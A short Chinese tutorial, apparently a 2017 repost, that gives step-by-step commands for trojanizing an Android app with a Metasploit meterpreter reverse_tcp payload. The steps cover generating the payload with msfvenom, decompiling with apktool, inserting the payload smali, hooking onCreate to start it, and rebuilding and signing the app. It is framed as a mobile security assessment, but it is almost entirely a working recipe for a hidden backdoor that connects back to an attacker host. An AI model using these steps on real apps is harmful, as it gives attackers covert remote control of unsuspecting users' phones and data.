本文讲的是
实用教程:手动安卓应用中注入msf后门,
在移动安全评估中,我们尝试将一些常用的应用程序加载上后门,并且加上后门之后应用程序毫无异常。这就可以用来证明如果使用的应用程序被种上后门,使用者会毫无知觉。
步骤一:生成攻击载荷
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.169 LPORT=4444 R > pentestlab.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8839 bytes
步骤二:逆向apk文件
java -jar apktool.jar d -f -o payload /root/Downloads/pentestlab.apk I: Using Apktool 2.2.2 on pentestlab.apk I: Loading resource table... I: Decoding AndroidManifest.xml with resources... I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk I: Regular manifest package... I: Decoding file-resources... I: Decoding values */* XMLs... I: Baksmaling classes.dex... I: Copying assets and libs... I: Copying unknown files... I: Copying original files...
步骤三:放置后门文件
/root/Downloads/payload/smali/com/metasploit/stage /root/Downloads/original/smali/com/metasploit/stage
步骤四:注入hook
;->onCreate(Landroid/os/Bundle;)V
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
步骤五:给予应用程序权限
步骤六:编译应用程序
java -jar apktool.jar b /root/Downloads/original/
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA /root/Downloads/original/dist/target.apk androiddebugkey
原文发布时间为:2017年6月30日
本文作者:xnianq
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。